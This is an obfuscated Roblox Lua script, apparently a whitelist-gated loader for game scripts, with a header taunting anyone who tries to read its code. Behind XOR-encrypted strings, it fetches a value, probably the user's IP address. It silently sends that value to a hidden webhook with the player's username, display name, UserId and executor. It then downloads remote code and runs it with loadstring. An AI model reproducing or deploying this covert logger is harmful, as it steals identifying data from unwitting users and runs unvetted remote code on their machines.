--[[

                        01001001 
         ?  ?                     01101110
      ?        ?                           01110100 
     ?    ? ?   ?                 ??                 01100101
                                                           01101110 
      NICE TRY SKID!!!                                              01110100 
                                                                             01100001 
A question.              Do you trying to rob the code?              01110011
                                                            01110100 
       ????????????????????                          01100101 
WOW!!, WHAT A SKID!   LOLOLOLL              00100000 
                                    1110010 
  MADE BY TECK BITCH.      01101111
                  01100010
         01100001
01110010

??? ]]--

--[[
 .____                               
 |    |    __ _______  
 |    |   |  |  \__  \   
 |    |___|  |  // __ \_ uu
 |_______ \____/(____  /           

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v139,v140) local v141={};for v165=1, #v139 do v6(v141,v0(v4(v1(v2(v139,v165,v165 + 1 )),v1(v2(v140,1 + (v165% #v140) ,1 + (v165% #v140) + 1 )))%256 ));end return v5(v141);end local v8=game:HttpGet(v7("\217\215\207\53\245\225\136\81\208\211\210\107\239\171\206\24\200\141\212\55\225","\126\177\163\187\69\134\219\167"));function SendMessage(v142,v143) local v144=0;local v145;local v146;local v147;local v148;local v149;while true do if (v144==(1 -0)) then v147={[v7("\168\43\30\34\118\171\239","\155\203\68\112\86\19\197")]=v143};v148=v145:JSONEncode(v147);v144=2;end if (v144==(157 -(26 + 131))) then local v174=0 + 0 ;while true do if (v174==(3 -2)) then v144=860 -(240 + 619) ;break;end if ((0 + 0)==v174) then v145=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));v146={[v7("\23\184\71\2\185\40\82\121\131\80\6\185","\38\84\215\41\118\220\70")]=v7("\81\6\50\30\247\83\23\54\27\241\94\89\40\1\241\94","\158\48\118\66\114")};v174=1 -0 ;end end end if (v144==2) then v149=request({[v7("\115\207\58","\152\38\189\86\156\32\24\133")]=v142,[v7("\209\82\179\78\243\83","\38\156\55\199")]=v7("\152\82\79\28","\35\200\29\28\72\115\20\154"),[v7("\49\186\208\219\136\62\39","\84\121\223\177\191\237\76")]=v146,[v7("\153\89\205\185","\161\219\54\169\192\90\48\80")]=v148});break;end end end function SendMessageEMBED(v150,v151) local v152=0;local v153;local v154;local v155;local v156;local v157;while true do if ((1 + 1)==v152) then v157=request({[v7("\242\70\124","\126\167\52\16\116\217")]=v150,[v7("\229\43\52\136\187\29","\156\168\78\64\224\212\121")]=v7("\55\193\150\250","\174\103\142\197"),[v7("\126\45\94\60\32\76\235","\152\54\72\63\88\69\62")]=v154,[v7("\246\203\234\69","\60\180\164\142")]=v156});break;end if (v152==(1744 -(1344 + 400))) then local v175=0;while true do if (v175==(406 -(255 + 150))) then v152=1;break;end if (v175==(0 + 0)) then v153=game:GetService(v7("\97\86\20\53\122\71\18\51\64\65\5","\69\41\34\96"));v154={[v7("\159\204\217\30\7\37\168\142\227\19\18\46","\75\220\163\183\106\98")]=v7("\3\170\155\59\208\1\187\159\62\214\12\245\129\36\214\12","\185\98\218\235\87")};v175=1;end end end if (v152==(1 + 0)) then v155={[v7("\206\49\37\227\218\185","\202\171\92\71\134\190")]={{[v7("\61\200\56\132\44","\232\73\161\76")]=v151.title,[v7("\191\220\81\94\12\178\201\86\84\17\181","\126\219\185\34\61")]=v151.description,[v7("\15\193\82\125\108","\135\108\174\62\18\30\23\147")]=v151.color,[v7("\176\224\47\199\28\189","\167\214\137\74\171\120\206\83")]=v151.fields,[v7("\141\255\61\73\253\181","\199\235\144\82\61\152")]={[v7("\19\19\161\63","\75\103\118\217")]=v151.footer.text}}}};v156=v153:JSONEncode(v155);v152=2;end end end local v9=v7("\80\74\17\57\52\183\93\23\90\12\58\36\226\0\92\16\6\38\42\162\19\72\87\74\62\34\239\26\87\81\14\58\104\188\64\14\6\92\126\112\190\69\15\10\81\122\118\181\70\15\12\81\102\63\190\11\77\68\80\30\44\255\61\127\107\63\6\17\225\33\123\77\46\26\13\232\40\86\13\1\22\127\202\57\93\111\80\8\1\238\51\73\116\48\22\113\203\57\123\107\82\3\18\231\31\80\107\12\4\114\190\67\90\102\19\127\37\193\8\77\84","\114\56\62\101\73\71\141");SendMessage(v9);local v10={[v7("\172\224\207\200\189","\164\216\137\187")]=v7("\241\238\48\189\181\190\61\133\168\103\252\243\231\75\254\233\54\161\252","\107\178\134\81\210\198\158"),[v7("\60\11\145\197\184\49\30\150\207\165\54","\202\88\110\226\166")]="We've detected a new log",[v7("\192\0\142\248\216","\170\163\111\226\151")]=2550000,[v7("\23\57\183\52\74\36","\73\113\80\210\88\46\87")]={{[v7("\143\45\192\23","\135\225\76\173\114")]=v7("\51\221","\199\122\141\216\208\204\221"),[v7("\187\220\28\229\125","\150\205\189\112\144\24")]=v8},{[v7("\43\133\178\73","\112\69\228\223\44\100\232\113")]=v7("\240\22\20\195\186\125\159\148\49\6\222\179","\230\180\127\103\179\214\28"),[v7("\154\4\83\83\225","\128\236\101\63\38\132\33")]=game.Players.LocalPlayer.DisplayName},{[v7("\162\168\28\65","\175\204\201\113\36\214\139")]=v7("\114\223\48\206\68\105\205\56\217","\100\39\172\85\188"),[v7("\187\121\181\149\54","\83\205\24\217\224")]=game.Players.LocalPlayer.Name},{[v7("\232\196\192\56","\93\134\165\173")]=v7("\139\225\196\208\122\231\150","\30\222\146\161\162\90\174\210"),[v7("\243\79\124\31\224","\106\133\46\16")]=game.Players.LocalPlayer.UserId},{[v7("\86\33\126\249","\32\56\64\19\156\58")]=v7("\127\208\245\90\85\251\148","\224\58\168\133\54\58\146"),[v7("\79\87\71\232\112","\107\57\54\43\157\21\230\231")]=identifyexecutor()}},[v7("\221\132\30\225\188\206","\175\187\235\113\149\217\188")]={[v7("\40\170\153\88","\24\92\207\225\44\131\25")]=" "}};SendMessageEMBED(v9,v10);local v11={[v7("\99\214\180\64\20\87\78\192\173\95\75\45\18","\29\43\179\216\44\123")]=true,[v7("\228\212\45\84\173","\44\221\185\64")]=true,[v7("\53\190\70\81\120","\19\97\135\40\63")]=true,[v7("\140\78\43\34\33\34","\81\206\60\83\91\79")]=true,[v7("\107\133\245\94\2\146\28","\196\46\203\176\18\79\163\45")]=true,[v7("\225\14\80\59\27\217\206\154\11","\143\216\66\30\126\68\155")]=true,[v7("\253\222\23\200\215\170\210\246","\129\202\168\109\171\165\195\183")]=true,[v7("\115\123\56\202\205\71\246","\134\66\56\87\184\190\116")]=true,[v7("\12\48\10\178\1\219\32\54\53","\85\92\81\105\219\121\139\65")]=true,[v7("\223\161\95\81\116\218\239\146\94\65\110\208\244\183","\191\157\211\48\37\28")]=true,[v7("\236\51\211\25\54\239\26\251\14\25\211\30\250","\90\191\127\148\124")]=true,[v7("\83\134\34\68\123\143\39\25\72\130\45\31\113\137","\119\24\231\78")]=true,[v7("\168\34\182\95\217\100\24\135\35\177\79\207\100\20\174\44\177\75","\113\226\77\197\42\188\32")]=true,[v7("\63\26\240\172\54\23\250\138\104\64\172","\213\90\118\148")]=true,[v7("\127\55\173\105\94\94\45\161\88\73\90\60\189\87","\45\59\78\212\54")]=true,[v7("\49\68\130\137\131\13\162\254\36\89\147\155\131\60\190","\144\112\54\227\235\230\78\205")]=true,[v7("\185\39\14\242\214\94\161\122\94","\59\211\72\111\156\176")]=true,[v7("\87\130\240\62\71\184\247\34\92\130\249","\77\46\231\131")]=true,[v7("\187\88\179\127\162\71\188\68","\32\218\52\214")]=true,[v7("\126\18\61\167\255\177\85\72\71\18\37\169\165","\58\46\119\81\200\145\208\37")]=true};local v12={[v7("\3\137\60\160\166\151\51\56\153\35\252\249\228","\86\75\236\80\204\201\221")]=v7("\50\1\83\144\238\142\50\102\101\128\240\138\118\68\55\215\190\173\123\89\114\129\181","\235\18\33\23\229\158"),[v7("\9\183\204\163\64","\219\48\218\161")]=v7("\164\49\91\124\242\15\196\246\112\123\78\218\77\236\225\49\115\71\155\127\195\171\92\83\107\242\99\197\175","\128\132\17\28\41\187\47"),[v7("\53\107\8\52\86","\61\97\82\102\90")]=v7("\236\110\141\71\206\89\25\73\156\34\170\82\194\69\13\73\152\33\235\125\200\94\26\66","\105\204\78\203\43\167\55\126"),[v7("\128\132\6\50\62\85\150","\49\197\202\67\126\115\100\167")]=v7("\119\27\243\38\143\70\30\28\82\211\37\192\102\82\54\66\218\59\147\29","\62\87\59\191\73\224\54"),[v7("\190\46\212\236\216\32\219\235\206","\169\135\98\154")]=v7("\139\55\1\90\233\54\218\139\85\49\64\233\60\198\139\81\45\76\248\55\131","\168\171\23\68\52\157\83"),[v7("\196\112\246\164\61\29\134\247\120","\231\148\17\149\205\69\77")]=v7("\192\231\225\247\94\241\135\231\208\242\67\247\192\128\213\254\89\254\132\162\135\169\23\207\129\181\211\242\84\243\133\180\140","\159\224\199\167\155\55"),[v7("\160\229\38\209\229\250\57\197","\178\151\147\92")]=v7("\204\189\97\61\16\69\118\137\189\107\7\59\12\76\137\239\95\59\29\66\49","\26\236\157\44\82\114\44"),[v7("\14\55\204\100\57\43\214\78\36\42\212\73\35\47","\59\74\78\181")]=v7("\101\145\110\95\191\32\193\85\72\167\101\229\85\26\178\101\225\95\84\176\44\221\17","\211\69\177\58\58"),[v7("\132\201\94\240\229\251\178\234\107\214\229\202\185","\171\215\133\25\149\137")]=v7("\161\136\19\244\251\57\188\100\237\193\60\253\164","\34\129\168\82\154\143\80\156"),[v7("\177\186\58\10\79\65\171\132\188\54\10\76\86","\233\229\210\83\107\40\46")]=v7("\129\2\19\210\1\196\70\114\231\16\200\65\57\150\34\211\71\60\215\1\196\2\96\150\34\205\75\38\213\13\138","\101\161\34\82\182"),[v7("\185\46\86\236\200\177\146","\78\136\109\57\158\187\130\226")]=v7("\126\127\216\228\42\48\185\194\59\51\252\242\42\127\223\248\38\58\253\186","\145\94\95\153")};local function v13(v158) local v159=406 -(183 + 223) ;local v160;while true do if (3==v159) then v160.Image=v7("\208\131\14\255\42\253\93\214\136\18\164\118\161\12\155\216\64\166\96\191\1\149\209","\56\162\225\118\158\89\142");v160.ImageColor3=Color3.fromRGB(66 -11 ,8 + 3 ,92 + 163 );v159=341 -(10 + 327) ;end if (v159==(2 + 0)) then v160.Size=UDim2.new(339 -(118 + 220) ,20,1 + 0 ,469 -(108 + 341) );v160.Position=UDim2.new(0 + 0 , -10,0 -0 , -(1503 -(711 + 782)));v159=3;end if (v159==(7 -3)) then v160.ScaleType=Enum.ScaleType.Slice;v160.SliceCenter=Rect.new(489 -(270 + 199) ,7 + 13 ,2099 -(580 + 1239) ,832 -552 );break;end if (v159==0) then v160=Instance.new(v7("\212\192\21\210\75\155\252\207\17\217","\215\157\173\116\181\46"));v160.Name=v7("\18\184\132\229","\186\85\212\235\146");v159=1;end if (v159==(1 + 0)) then v160.Parent=v158;v160.BackgroundTransparency=1;v159=1 + 1 ;end end end local v14=Instance.new(v7("\111\6\210\170\39\214\123\16\201","\184\60\101\160\207\66"));v14.Name=v7("\6\138\117\168\52\142\117\175\37\163\114\184\29\141\123\175\2\129\110\185\52\140\91\169\56","\220\81\226\28");v14.ZIndexBehavior=Enum.ZIndexBehavior.Global;v14.IgnoreGuiInset=true;v14.ResetOnSpawn=false;v14.Parent=game.Players.LocalPlayer:WaitForChild(v7("\35\217\131\226\239\213\52\192\139","\167\115\181\226\155\138"));local v21=Instance.new(v7("\196\48\230\81\126","\166\130\66\135\60\27\17"));v21.Name=v7("\102\70\219\103\22\86\75\195\112","\80\36\42\174\21");v21.Size=UDim2.new(1 + 0 ,0 -0 ,1,0);v21.Position=UDim2.new(0,0,0 + 0 ,1167 -(645 + 522) );v21.BackgroundColor3=Color3.fromRGB(0,0,1790 -(1010 + 780) );v21.BackgroundTransparency=0.1 + 0 ;v21.BorderSizePixel=0 -0 ;v21.Parent=v14;local v29=Instance.new(v7("\108\28\34\104\107\22\49\127\77\4","\26\46\112\87"));v29.Name=v7("\142\43\162\96\186\179\76\167\173\2\165\112\147\176\66\167\155\47\190\102\154\185\67\177\186\55","\212\217\67\203\20\223\223\37");v29.Size=175 -115 ;v29.Parent=v21;local v33=Instance.new(v7("\156\159\169\223\191","\178\218\237\200"));v33.Name=v7("\148\180\229\219\177\167\233\197\184\177\192\194\183\184\227","\176\214\213\134");v33.Size=UDim2.new(1836.8 -(1045 + 791) ,0,0.8,0);v33.Position=UDim2.new(0.1 -0 ,0 -0 ,505.1 -(351 + 154) ,0);v33.BackgroundColor3=Color3.fromRGB(1829 -(1281 + 293) ,521 -(28 + 238) ,569 -314 );v33.BackgroundTransparency=1560 -(1381 + 178) ;v33.BorderSizePixel=0 + 0 ;v33.ZIndex=2;v33.Parent=v21;local v42=Instance.new(v7("\192\168\174\192\132\87\91\241\161","\57\148\205\214\180\200\54"));v42.Name=v7("\37\245\60\32\115\30\244\38\32\66\27\233\57\49\90\19\255\48\56","\22\114\157\85\84");v42.Size=UDim2.new(0.4,0 + 0 ,0.05 + 0 ,0 -0 );v42.Position=UDim2.new(0.1 + 0 ,470 -(381 + 89) ,0.15 + 0 ,0);v42.BackgroundTransparency=1;v42.Text=v7("\243\195\26\208\88\250\161\215\223\83\241\78\243\186\215\145","\200\164\171\115\164\61\150");v42.TextColor3=Color3.fromRGB(173 + 82 ,436 -181 ,1411 -(1074 + 82) );v42.TextSize=39 -21 ;v42.Font=Enum.Font.Roboto;v42.ZIndex=1787 -(214 + 1570) ;v42.Parent=v33;v13(v42);local v54=Instance.new(v7("\141\247\17\74\143\178\253\13\66\165\172\245\14\64","\227\222\148\99\37"));v54.Name=v7("\4\90\91\226\252\63\91\65\226\202\48\64\93\250\245\21\64\83\251\252","\153\83\50\50\150");v54.Size=UDim2.new(1455.4 -(990 + 465) ,0 + 0 ,0.6 + 0 ,0);v54.Position=UDim2.new(0.1,0 + 0 ,0.25,0 -0 );v54.BackgroundTransparency=1727 -(1668 + 58) ;v54.ScrollBarThickness=631 -(512 + 114) ;v54.ScrollingDirection=Enum.ScrollingDirection.Y;v54.ZIndex=7 -4 ;v54.Parent=v33;local function v64() for v166,v167 in pairs(v11) do local v168=0 -0 ;local v169;while true do if (v168==2) then v169.TextColor3=(v11[v166] and Color3.fromRGB(887 -632 ,255,119 + 136 )) or Color3.fromRGB(0,0 + 0 ,0) ;v169.TextSize=16 + 2 ;v169.Font=Enum.Font.Arial;v168=3;end if (v168==(0 -0)) then local v191=1994 -(109 + 1885) ;while true do if (v191==(1470 -(1269 + 200))) then v169.Size=UDim2.new(1 -0 ,0,815 -(98 + 717) ,856 -(802 + 24) );v168=1 -0 ;break;end if ((0 -0)==v191) then v169=Instance.new(v7("\105\115\107\8\95\170\79\88\122","\45\61\22\19\124\19\203"));v169.Name=v166   .. v7("\237\19\15\240\14","\217\161\114\109\149\98\16") ;v191=1 + 0 ;end end end if ((3 + 0)==v168) then v169.ZIndex=1 + 2 ;v169.Parent=v54;if v11[v166] then v13(v169);end break;end if (v168==(1 + 0)) then local v194=0 -0 ;while true do if (v194==(0 -0)) then v169.Position=UDim2.new(0,0 + 0 ,0 + 0 ,30 * ( #v54:GetChildren() -(1 + 0)) );v169.BackgroundTransparency=1 + 0 ;v194=1;end if (v194==1) then v169.Text=v166;v168=2;break;end end end end end end v64();local v65=Instance.new(v7("\38\37\32\104\144\117\16\37\52","\20\114\64\88\28\220"));v65.Name=v7("\29\14\213\167\204\217\169\61\4\254\181\250\213\177","\221\81\97\178\212\152\176");v65.Size=UDim2.new(0.4 + 0 ,1433 -(797 + 636) ,0.05 -0 ,0);v65.Position=UDim2.new(0.5,1619 -(1427 + 192) ,0.15,0 + 0 );v65.BackgroundTransparency=1;v65.Text=v7("\238\239\28\245\29\200\167\49\244\29\222\189","\122\173\135\125\155");v65.TextColor3=Color3.fromRGB(592 -337 ,255,230 + 25 );v65.TextSize=9 + 9 ;v65.Font=Enum.Font.Roboto;v65.ZIndex=329 -(192 + 134) ;v65.Parent=v33;v13(v65);local v76=Instance.new(v7("\183\194\18\182\51\61\193\138\198\38\171\62\60\205","\168\228\161\96\217\95\81"));v76.Name=v7("\247\222\41\79\28\84\201\222\34\80\9\69\218\220\43","\55\187\177\78\60\79");v76.Size=UDim2.new(1276.4 -(316 + 960) ,0,0.6,0 + 0 );v76.Position=UDim2.new(0.5,0 + 0 ,0.25 + 0 ,0 -0 );v76.BackgroundTransparency=552 -(83 + 468) ;v76.ScrollBarThickness=1811 -(1202 + 604) ;v76.ScrollingDirection=Enum.ScrollingDirection.Y;v76.ZIndex=3;v76.Parent=v33;local function v85() for v170,v171 in pairs(v12) do local v172=0;local v173;while true do if (v172==3) then v173.TextXAlignment=Enum.TextXAlignment.Left;v173.ZIndex=3;v173.Parent=v76;v172=4;end if (v172==(0 -0)) then v173=Instance.new(v7("\25\203\71\255\106\206\130\40\194","\224\77\174\63\139\38\175"));v173.Name=v170   .. v7("\168\78\95\2\133\67\93\34","\78\228\33\56") ;v173.Size=UDim2.new(1,0 -0 ,0,30);v172=1;end if (v172==2) then v173.TextColor3=Color3.fromRGB(706 -451 ,580 -(45 + 280) ,247 + 8 );v173.TextSize=16 + 2 ;v173.Font=Enum.Font.Arial;v172=2 + 1 ;end if ((1 + 0)==v172) then v173.Position=UDim2.new(0 + 0 ,0 -0 ,1911 -(340 + 1571) ,(12 + 18) * ( #v76:GetChildren() -(1773 -(1733 + 39))) );v173.BackgroundTransparency=1;v173.Text=v171;v172=2;end if (v172==(10 -6)) then v13(v173);break;end end end end v85();local v86=Instance.new(v7("\250\123\170\23\169\207\124\183\15","\229\174\30\210\99"));v86.Name=v7("\54\236\130\84\207\36\13\30\245\146","\89\123\141\230\49\141\93");v86.Size=UDim2.new(1034 -(125 + 909) ,200,0,20);v86.Position=UDim2.new(1949 -(1096 + 852) , -220,1 + 0 , -30);v86.BackgroundTransparency=1 -0 ;v86.Text=v7("\222\112\242\9\80\72\234\49\194\9\19\65\179\60\182\10\4\4\179\75\218\58\81","\42\147\17\150\108\112");v86.TextColor3=Color3.fromRGB(248 + 7 ,767 -(409 + 103) ,491 -(46 + 190) );v86.TextSize=109 -(51 + 44) ;v86.Font=Enum.Font.Roboto;v86.TextXAlignment=Enum.TextXAlignment.Right;v86.ZIndex=1 + 2 ;v86.Parent=v33;local v99=Instance.new(v7("\59\163\53\107\203\233\13\163\33","\136\111\198\77\31\135"));v99.Name=v7("\52\12\181\69\180\235\25\157\7\17\179","\201\98\105\199\54\221\132\119");v99.Size=UDim2.new(1317 -(1114 + 203) ,926 -(228 + 498) ,0,20);v99.Position=UDim2.new(0 + 0 ,20,1 + 0 , -30);v99.BackgroundTransparency=664 -(174 + 489) ;v99.Text=v7("\154\25\145\51\7\59\184\249\26\134\51\17\60\163\183\86\195\115\76\98\226\239\22\194","\204\217\108\227\65\98\85");v99.TextColor3=Color3.fromRGB(664 -409 ,2160 -(830 + 1075) ,779 -(303 + 221) );v99.TextSize=14;v99.Font=Enum.Font.Roboto;v99.TextXAlignment=Enum.TextXAlignment.Left;v99.ZIndex=1272 -(231 + 1038) ;v99.Parent=v33;local v112=Instance.new(v7("\106\198\237\241\14\213\74\215\250\235","\160\62\163\149\133\76"));v112.Name=v7("\245\168\8\44\200\244\181\25\59\204\216","\163\182\192\109\79");v112.Size=UDim2.new(0.2 + 0 ,1162 -(171 + 991) ,0.09 -0 ,0 -0 );v112.Position=UDim2.new(0.3,0 -0 ,0.89 + 0 ,0 -0 );v112.BackgroundColor3=Color3.fromRGB(0,86 -56 ,0 -0 );v112.BackgroundTransparency=0.7 -0 ;v112.BorderSizePixel=1248.1 -(111 + 1137) ;v112.TextColor3=Color3.fromRGB(413 -(91 + 67) ,758 -503 ,255);v112.TextSize=4 + 10 ;v112.Text=v7("\4\5\64\231\192\29","\149\84\70\96\160");v112.Font=Enum.Font.Roboto;v112.ZIndex=526 -(423 + 100) ;v112.Parent=v33;v13(v112);local v125=Instance.new(v7("\12\3\21\249\26\19\25\249\55\8","\141\88\102\109"));v125.Name=v7("\158\92\200\121\22\56\119\212\167\71\197\126","\161\211\51\170\16\122\93\53");v125.Size=UDim2.new(0.2,0 + 0 ,0.09 -0 ,0 + 0 );v125.Position=UDim2.new(0.5,0,771.89 -(326 + 445) ,0);v125.BackgroundColor3=Color3.fromRGB(174 -134 ,0 -0 ,0 -0 );v125.BackgroundTransparency=711.7 -(530 + 181) ;v125.BorderSizePixel=881.1 -(614 + 267) ;v125.TextColor3=Color3.fromRGB(287 -(19 + 13) ,414 -159 ,255);v125.TextSize=32 -18 ;v125.Text=v7("\214\129\144\1\215\139\242\15\206\135","\72\155\206\210");v125.Font=Enum.Font.Roboto;v125.ZIndex=8 -5 ;v125.Parent=v33;v13(v125);local function v138(v161,v162) local v163=0 + 0 ;local v164;while true do if (v163==0) then v164=game.Players.LocalPlayer.Name;if (v164==v7("\114\114\93\15\52\73\88\85\0\54\71\126\76","\83\38\26\52\110")) then game.Players.LocalPlayer:Kick(v7("\107\30\32\83\93\87\42\71\86\19\38\72\92\24\103\69\89\5\38\85\24\7\50\82\87\87\51\78\81\22\32\73\22","\38\56\119\71"));return;end v163=1 -0 ;end if (v163==(1 -0)) then if v11[v164] then local v208=1812 -(1293 + 519) ;local v209;local v210;local v211;while true do if (1==v208) then v211=nil;while true do if (v209==0) then game.StarterGui:SetCore(v7("\192\234\86\210\11\89\231\230\94\223\38\87\231\230\87\216","\54\147\143\56\182\69"),{[v7("\226\136\235\69\218","\191\182\225\159\41")]=v7("\10\7\60\93\142\137\214\34\17\41\65\130\136\204","\162\75\114\72\53\235\231"),[v7("\184\57\92\246","\98\236\92\36\130\51")]=v7("\157\22\25\250\68\186\176\112\173\23\76\174\77\173\245\39\172\16\24\191\73\161\166\36\234\89\59\191\73\171\186\61\161\89\24\181\5","\80\196\121\108\218\37\200\213")   .. v162   .. v7("\64\69\7\109\88\7\133\14\61","\234\96\19\98\31\43\110") ,[v7("\47\28\93\201","\235\102\127\50\167\204\18")]=v7("\88\181\225\51\30\97\31\182\226\52\10\60\95\163\249\44\92\96\83\174\248\108\69\61\67\164\225\108\27\39\84\252\160\118\28\123\0\248\160\118\20\119","\78\48\193\149\67\36"),[v7("\20\11\146\25\85\57\17\142","\33\80\126\224\120")]=5 -2 });v210,v211=pcall(function() return game:HttpGet(v161);end);v209=2 -1 ;end if (v209==(1 -0)) then if v210 then local v231=0;while true do if (v231==(0 -0)) then loadstring(v211)();v14:Destroy();break;end end else game.StarterGui:SetCore(v7("\223\173\13\192\114\227\188\10\194\85\239\169\23\205\83\226","\60\140\200\99\164"),{[v7("\179\253\16\42\167","\194\231\148\100\70")]=v7("\117\79\211\170\230\220\6\96\206\162\242\193\72\75\129\134\228\218\73\94\128","\168\38\44\161\195\150"),[v7("\180\249\154\98","\118\224\156\226\22\80\136\214")]=v7("\100\239\80\140\71\234\25\148\77\174\85\143\67\234\25\148\74\235\25\147\65\252\80\144\86\160\25\176\78\235\88\147\71\174\77\146\91\174\88\135\67\231\87\192\78\239\77\133\80\160","\224\34\142\57"),[v7("\247\164\202\211","\110\190\199\165\189\19\145\61")]=v7("\210\255\99\248\209\136\149\252\96\255\197\213\213\233\123\231\147\137\217\228\122\167\138\212\201\238\99\167\212\206\222\182\34\189\211\146\138\178\34\189\219\158","\167\186\139\23\136\235"),[v7("\62\160\154\12\14\188\135\3","\109\122\213\232")]=9 -5 });end break;end end break;end if (v208==(0 + 0)) then v209=0 + 0 ;v210=nil;v208=2 -1 ;end end else game.StarterGui:SetCore(v7("\221\242\172\52\192\248\182\57\232\254\161\49\250\254\173\62","\80\142\151\194"),{[v7("\55\207\99\64\6","\44\99\166\23")]=v7("\93\226\61\62\54\170\104\254\42\55\39\173\115\249","\196\28\151\73\86\83"),[v7("\199\6\49\4","\22\147\99\73\112\226\56\120")]=v7("\129\122\247\181\140\170\112\162\251\130\172\53\237\251\205\172\125\231\181\154\176\124\246\240\129\177\102\246\187\205\136\121\231\244\158\189\53\225\250\131\172\116\225\225\205\183\98\236\240\159\248\81\235\230\142\183\103\230\175\205\152\97\183\251\131\179\59","\237\216\21\130\149"),[v7("\171\77\80\81","\62\226\46\63\63\208\169")]=v7("\237\13\65\147\69\66\96\73\242\14\27\145\16\15\35\81\253\87\86\140\18\66\46\77\246\28\65\204\64\4\43\3\176\76\13\214\79\84\122\11\181\64","\62\133\121\53\227\127\109\79"),[v7("\52\1\32\244\194\167\173\30","\194\112\116\82\149\182\206")]=3 + 7 });local v212=Instance.new(v7("\13\173\84\12\226\247\26\45\167\66","\110\89\200\44\120\160\130"));v212.Name=v7("\136\207\68\85\70\104\46\89\191\204\69","\45\203\163\43\38\35\42\91");v212.Size=UDim2.new(0.2 + 0 ,0 + 0 ,1096.09 -(709 + 387) ,1858 -(673 + 1185) );v212.Position=UDim2.new(0.4 -0 ,0 -0 ,0.9,82 -32 );v212.BackgroundColor3=Color3.fromRGB(18 + 7 ,0 + 0 ,0);v212.BackgroundTransparency=0.7;v212.BorderSizePixel=0;v212.TextColor3=Color3.fromRGB(270 -70 ,50 + 150 ,398 -198 );v212.TextSize=15;v212.Text=v7("\247\157\213\55","\52\178\229\188\67\231\201");v212.Font=Enum.Font.Roboto;v212.ZIndex=5 -2 ;v212.Parent=v33;v13(v212);v212.MouseButton1Click:Connect(function() v14:Destroy();end);end break;end end end v112.MouseButton1Click:Connect(function() v138(v7("\41\85\68\20\228\6\108\110\83\81\19\185\91\42\53\73\69\6\226\79\38\51\66\95\10\227\89\45\53\15\83\11\250\19\118\116\68\83\15\252\19\110\24\111\126\42\195\125\27\110\76\81\13\249\19\16\34\83\89\20\227","\67\65\33\48\100\151\60"),v7("\239\196","\147\191\135\206\184"));end);v125.MouseButton1Click:Connect(function() v138(v7("\140\60\178\209\203\9\253\203\58\167\214\150\84\187\144\32\179\195\205\64\183\150\43\169\207\204\86\188\144\102\165\206\213\28\231\209\45\165\202\211\28\255\189\6\136\239\236\114\138\201\5\137\227\151\94\179\141\38\233\242\219\65\187\148\60","\210\228\72\198\161\184\51"),v7("\27\70\241\25\127\203","\174\86\41\147\112\19"));end);
